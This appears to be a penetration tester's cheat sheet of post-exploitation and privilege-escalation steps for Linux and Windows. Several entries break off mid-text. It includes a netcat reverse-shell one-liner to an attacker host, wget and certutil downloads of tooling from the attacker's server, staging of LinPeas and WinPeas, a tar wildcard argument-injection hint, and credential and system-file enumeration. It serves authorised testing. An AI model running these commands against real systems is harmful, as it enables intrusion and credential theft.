• If… then…

    Enumeration Code execution I am stuck

  • What to do if all ports seem to be closed? Open Wireshark and monitor it during a full TCP scan. Scan all UDP ports as well. Filter in Wireshark for traffic where the target connected back to you. Port knocking? Can you trigger the server via a third party? Or does its behaviour change based on time?

  • Prepare your own system:
        cd p151.general.1
        ./scripts/update_privesc_scripts.sh
        cd scripts/privesc/linux
        python -m SimpleHTTPServer 80
    Prepare the target:
        cd /dev/shm
        wget http://$attackerip/_ex.tar
        tar xf _ex.tar
        script
    Now, execute it:
        LinPeas: ./linpeas.sh
        LinEnum: ./LinEnum.sh
        linux-smart-enumeration: ./lse.sh -l1
        linux-exploit-suggester-2: ./linux-exploit-suggester-2.pl
        sudo-killer: ./SUDO_KILLERv2.0.5.sh
        linuxprivchecker: ./linuxprivchecker.py
    Finally: copy the typescript file (recorded by script) to the PentestManager!

  • Linux privilege escalation

    Additional ideas
    Environment exploitation
    Interpolation exploitation
    Prerequisites: Then, create a file in a directory which is named like a parameter of the program. The program will interpret the filenames as arguments. Example: Assume there is a call like this in a script: tar czf /tmp/backup.tar.gz * The script is in /home/peter and because we are this…

  • If your console is narrow, widen it at the beginning:
        stty rows 50 cols 200
    Consider directly spawning another reverse shell:
        nc -e /bin/sh $attackerip 4444 &
    Basic enumeration about the host:
        id
        groups
        cat /etc/passwd
        cat /etc/group
        cat /etc/hosts
        cat /etc/fstab
        uname -a    // Check for kernel exploits
                    // ALSO search for kernel exploits with OS name!
                    // If this…

  • Prepare your own system:
        cd p151.general.1/scripts/privesc/windows
        python -m SimpleHTTPServer 80
    Prepare the target:
        set NTPSRV=$ownIp
        mkdir C:\Windows\System32\spool\drivers\color\wsc
        cd C:\Windows\System32\spool\drivers\color\wsc
    Download most scripts at once (>30 MB!):
        certutil.exe -urlcache -split -f "http://%NTPSRV%/7za.exe"
        certutil.exe -urlcache -split -f "http://%NTPSRV%/_ex.zip"
        7za.exe x _ex.zip
    WinPeas (Github):
        winPEAS.bat
        winPEASx86.exe
        winPEASx64.exe
    Powerless (Github):
        certutil.exe -urlcache -split -f "http://%NTPSRV%/Powerless.bat" Powerless.bat
        Powerless.bat
    Windows Exploit Suggester NG (Github)…

  • dir
    General:
    Usual commands:
    Therefore: Remember to use dir /R /as /ah -force.
    tree
    Start with creating a list of all directories and files. Download it. It's way easier to look at in a local editor and it's stored for the future as well.
        tree c:\ > C:\Windows\Temp\dsys\dirs.txt
        dir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt
    (Download the files)…

  • General system enumeration
    Get general information about the OS:
        systeminfo
    Get the environment variables:
        set
    Enumerate cached credentials:
        cmdkey /list
    If the current system is not known yet, try to determine the version via one of the following files:
    Processes enumeration
        tasklist /V
        tasklist /V | find "cmd.exe"    // Search for a command
        tasklist /V /fi "USERNAME eq NT…